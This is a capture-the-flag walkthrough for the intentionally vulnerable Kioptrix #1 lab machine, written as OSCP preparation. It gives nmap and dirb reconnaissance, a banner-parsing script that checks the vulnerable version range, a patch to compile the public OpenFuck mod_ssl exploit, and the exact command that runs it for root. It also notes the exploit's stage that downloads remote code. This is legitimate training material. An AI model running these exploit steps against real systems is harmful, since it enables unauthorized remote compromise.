VulnHub Walkthrough – Kioptrix #1

Vulnhub link: kioptrix #1

I attempted (and succeeded) to root this box as part of my preparations for the OSCP exam. This was a very easy box to own (it is noted as ‘beginner’ for a reason).

Run netdiscover to find the target host:

netdiscover

In this case, our target is located at 192.168.174.129. Let’s run a standard nmap scan against it (-A already implies -sV and -O, and -v -v -v -v is just -vvvv, so the extra flags are harmless):

nmap -sS -sV -T4 -A -O -v -v -v -v 192.168.174.129

The nmap version scan reports the web server on ports 80/443 as Apache 1.3.20, but browsing it turns up nothing of interest. Running dirb against it reveals the directory /manual/, which holds the documentation for two Apache modules. One of them is mod_ssl, and navigating to /manual/mod/mod_ssl/ reveals that the installed mod_ssl version is 2.8.

[screenshot: mod_ssl manual page]

Searching exploit-db for Apache 1.3.20 turns up a remote buffer overflow in mod_ssl that allows arbitrary code execution on the server. Bingo.
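The post reads the mod_ssl version off the /manual/ pages by hand; the Server banner that nmap -sV (or a HEAD request) returns carries the same information, and it is worth comparing it against the version bounds before reaching for an exploit. The POSIX shell script below is an added example, not code from the original post or from OpenFuck. It extracts the Apache, mod_ssl and OpenSSL version tokens from a banner and reports whether they fall inside the range the OpenFuck exploit-db entry covers. Assumptions: the "mod_ssl < 2.8.7" bound is taken from the exploit-db title for OpenFuck, the OpenSSL bound 0.9.6e is the release that fixed the SSLv2 handshake overflow the exploit abuses, and SAMPLE_BANNER is a constructed string in the shape this box reports, not captured output.

```shell
#!/bin/sh
# Added example for this walkthrough, not code from the original post or from
# OpenFuck. Parse an Apache Server banner and check the mod_ssl / OpenSSL
# versions against the bounds of the OpenFuck exploit-db entry.
# Assumptions: mod_ssl < 2.8.7 (exploit-db title), OpenSSL < 0.9.6e (the
# release that fixed the SSLv2 handshake overflow). SAMPLE_BANNER is constructed.

# banner_field BANNER TOKEN -> prints the version after "TOKEN/" (empty if absent)
banner_field() {
    printf '%s\n' "$1" | sed -n "s/.*$2\/\([0-9][0-9A-Za-z.]*\).*/\1/p"
}

# vercmp_lt A B -> exit 0 if version A sorts before B, 1 otherwise.
# Components are compared numerically, then by letter suffix (0.9.6b < 0.9.6e).
vercmp_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, A, "."); nb = split(b, B, ".")
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            x = (i in A) ? A[i] : "0"; y = (i in B) ? B[i] : "0"
            xn = x + 0; yn = y + 0            # awk keeps the leading digits
            if (xn != yn) exit ((xn < yn) ? 0 : 1)
            xs = x; sub(/^[0-9]+/, "", xs)    # whatever follows the digits
            ys = y; sub(/^[0-9]+/, "", ys)
            if (xs != ys) exit ((xs < ys) ? 0 : 1)
        }
        exit 1                                # versions are equal
    }'
}

# modssl_in_range BANNER -> 0 if mod_ssl < 2.8.7, 1 if newer, 2 if no token
modssl_in_range() {
    v=$(banner_field "$1" mod_ssl)
    [ -n "$v" ] || return 2
    vercmp_lt "$v" 2.8.7
}

# openssl_in_range BANNER -> 0 if OpenSSL < 0.9.6e, 1 if newer, 2 if no token
openssl_in_range() {
    v=$(banner_field "$1" OpenSSL)
    [ -n "$v" ] || return 2
    vercmp_lt "$v" 0.9.6e
}

# Constructed sample in the shape of the banner this box reports. For a live
# target use something like:
#   curl -sI "http://$TARGET/" | sed -n 's/^[Ss]erver: *//p' | tr -d '\r'
SAMPLE_BANNER='Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b'

# report BANNER -> print the parsed versions and a verdict
report() {
    printf 'Apache  %s\n' "$(banner_field "$1" Apache)"
    printf 'mod_ssl %s\n' "$(banner_field "$1" mod_ssl)"
    printf 'OpenSSL %s\n' "$(banner_field "$1" OpenSSL)"
    if modssl_in_range "$1" && openssl_in_range "$1"; then
        echo 'VERDICT: inside the range OpenFuck targets; confirm against the exploit-db entry'
    else
        echo 'VERDICT: outside the range; look for another vector'
    fi
}

report "$SAMPLE_BANNER"
```

The version comparison is done in awk rather than with sort -V so the script also runs on minimal images without GNU coreutils; a banner with no mod_ssl token (a non-Apache server, or Apache with ServerTokens tightened) returns 2 rather than a false negative, so you know the check was inconclusive instead of clean.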

Download an exploit for this vulnerability, called OpenFuck, from GitHub. Depending on whether the repository has been updated since this post was written, you may have to make one small modification to the source: as of writing, line 1087 of OpenFuck.c contains a typo (a broken if statement). Change it so that it matches the following:

if (encrypted_key_length <= 0) {
    /* RSA encryption of the client master key failed; abort the handshake */
    printf("send client master key: RSA encryption failure\n");
    exit(1);
}

You should now be able to compile the exploit with gcc (link it against the crypto library with -lcrypto). The exploit was written against the OpenSSL 0.9.x API, so on a current distribution you may also need the legacy OpenSSL 1.0 development headers installed before it compiles and links.

gcc -o OpenFuck OpenFuck.c -lcrypto

Running ./OpenFuck with no arguments prints a long list of target fingerprints. The two we want are 0x6a and 0x6b, RedHat Linux 7.2 (apache-1.3.20-16) entries 1 and 2; piping the list through grep for apache-1.3.20 is the quickest way to find them. We pass this target number to OpenFuck so it knows which memory offsets to use.

./OpenFuck 0x6b 192.168.174.129 443 -c 40

After a few seconds we should have root on the box. If the run fails, try the other fingerprint (0x6a). Note that OpenFuck's root stage downloads a local kernel exploit over HTTP from inside the shell it obtains and compiles it there, so the target must be able to reach the URL in the source (or you point that URL at a host you control).

[screenshot: rooted]
